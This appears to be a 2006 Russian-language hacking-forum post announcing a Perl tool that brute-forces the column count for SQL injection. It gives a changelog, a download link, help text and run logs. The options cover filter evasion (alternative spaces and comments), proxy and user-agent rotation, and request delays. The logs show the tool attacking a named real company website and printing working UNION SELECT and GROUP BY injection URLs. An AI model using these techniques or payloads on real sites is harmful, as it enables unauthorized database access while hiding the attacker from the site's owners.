03.12.2006, 23:03
|
|
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935
Репутация:
1202
|
|
Antichat SQL-tools
Antichat SQL-tools for check columns v.1.1.1
Скрипт для подбора числа столбцов в БД.
Основная функция:
- подбор числа столбцов
Обращаю ваше внимание, что консольная и гуи одной версии практически аналогичны по фунциональности.
v1.1.1(25.11.2006) - новое: по просьбам телезрителей: вывел куки, добавил работу через сокет
- фикс: забыл поставит chomp() при загрузке проксей и user-agent...
- новое: вывел дата+время атаки
v1.1.0(15.10.2006) - новое: GUI-интерфейс!
- новое: эвристическое определение необходимых параметров
- фикс: Win\Nix-совместимость
v1.0.9(12.10.2006) - новое: прокси - рэндомный выбор из файла
- новое: юзер-агент - рэндомный выбор из файла
- новое: случайное\фиксированное время задержки между запросами
- оптимизация кода и алгоритмов
v1.0.8(10.10.2006) - фикс: исправил грубую ошибку в работе пост-запросом
v1.0.7(30.09.2006) - оптимизация кода
v1.0.6(17.07.2006) - фикс: переработан механизм перебора для GROUP и ORDER, что уменьшает число запросов + экономит трафик.
v1.0.5(31.08.2006) - новое: логирование результата
v1.0.4 - мелкая оптимизация, правка багов, автоматизация
v1.0.3 - новое: на выбор три типа перебора - union, group by и order by(Greets ZaCo)
- новое: добавил getopts. Теперь удобно указывать параметры
- новое: возможность указать начальное и конечное число столбцов.
- новое: поддержка прокси
- новое: рабочий POST или GET запрос
v1.0.2 - новое: что подставлять в столбцы - цифры или null'ы
- новое: альтернативная замена пробелов
- новое: альтернативная замена коментов
- новое: защита от дурака + хелп
v1.0.1 - новое: автовыход при найденных столбцах(ориентир - по отсутствию указанной вами ошибке)
v1.0.0(19.06.2006) - Увидел cкрипт Форба(10 строк). Появилось желание доработать.
Скачать: http://sec-123.narod.ru/public/sql_check_public.rar
Выдержка из хелпа:
Код:
Options:
-u - путь к сайту с уязвимым скриптом, например http://site.com/index.php?user=-1'))
-a - строка с ошибкой неправильного числа столбцов, по её отсутствию в верном запросе определяется конец перебора
-n - с какого столбца начнём брут?
-N - до какакого столбца будем брутить?
-m - способ подбора: UNION SELECT, GROUP BY, ORDER BY. Быстрее работает group и order, но надёжнее union.
-s - разделитель между операторами. Иногда пробел фильтруецца - юзаем многочисленные его альтернативы.
-z - столбцы при union-методе можно перечислять цифрами(1,2,3..), а можно нулами(null)
-c - комменты в конце выражения. Для mysql характерно "/*" , а для mssql "--"
-g - работа через гет или пост-запросы
-t - время задержки. выдерживается пауза при каждом запросе. RAND - случайная от 0 до 10
-b - юзер-агент. выбирается случайный юзер-агент при каждом запросе
-p - файл с проксями. выбирается случайная прокся при каждом запросе
-l - логирование работы в файл
Алармы.
Внимание! Файл лога сохраняется в папку, из которой был запущен родитель процеса перл(для виндв - cmd.exe).
Рекомендую создать в папке со скриптом bat-файл с содержимым "cmd.exe".
Внимание! GUI(TK) под никсами выглядит не очень красиво =)
Протестить на сайте:
Код:
C:\sql-check.pl -u "http://www.comstar.ru/press-center/news/?month=10&year=2004"
Лог работы:
Код:
=========_Script_Brut_Columns_========
*URL:___________http://www.comstar.ru/press-center/news/?month=10&year=2004
Evristic:______ON
Min_colomns:___1
Max_colomns:___50
Metod:_________UNION
SPACE:_________%20
NULL:__________1
POST-GET:______GET
Time(sleep):___0
User-Agent:____useragent.txt
PROXY:_________proxy.txt
Log:___________log.txt
=========_Script_Brut_Columns_========
GO!
Start evristic detection.
Please, WAIT...
Detect MySQL
Start UNION
Please Wait...
Try 1 column... NOT FOUND =(
Try 2 column... NOT FOUND =(
Try 3 column... NOT FOUND =(
Try 4 column... NOT FOUND =(
Try 5 column... NOT FOUND =(
Try 6 column... NOT FOUND =(
Try 7 column... NOT FOUND =(
Try 8 column... NOT FOUND =(
Try 9 column... NOT FOUND =(
Try 10 column... NOT FOUND =(
Try 11 column...
------------------------
OK! Find 11 columns.
Right URL:
http://www.comstar.ru/press-center/news/?month=10&year=2004%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11/*
Код:
=========_Script_Brut_Columns_========
*URL:___________http://www.comstar.ru/press-center/news/?month=10&year=2004
Evristic:______ON
Min_colomns:___1
Max_colomns:___50
Metod:_________GROUP
SPACE:_________%20
NULL:__________1
POST-GET:______GET
Time(sleep):___0
User-Agent:____useragent.txt
PROXY:_________proxy.txt
Log:___________log.txt
=========_Script_Brut_Columns_========
GO!
Start evristic detection.
Please, WAIT...
Detect MySQL
Start GROUP
Please Wait...
Try 25 column... ok!
Try 13 column... ok!
Try 7 column... no...
Try 10 column... no...
Try 10 column... ok!
Try 11 column... ok!
Try 12 column...
------------------------
OK! Find 11 columns.
Right URL:
http://www.comstar.ru/press-center/news/?month=10&year=2004%20GROUP%20BY%2012/*
|
|
|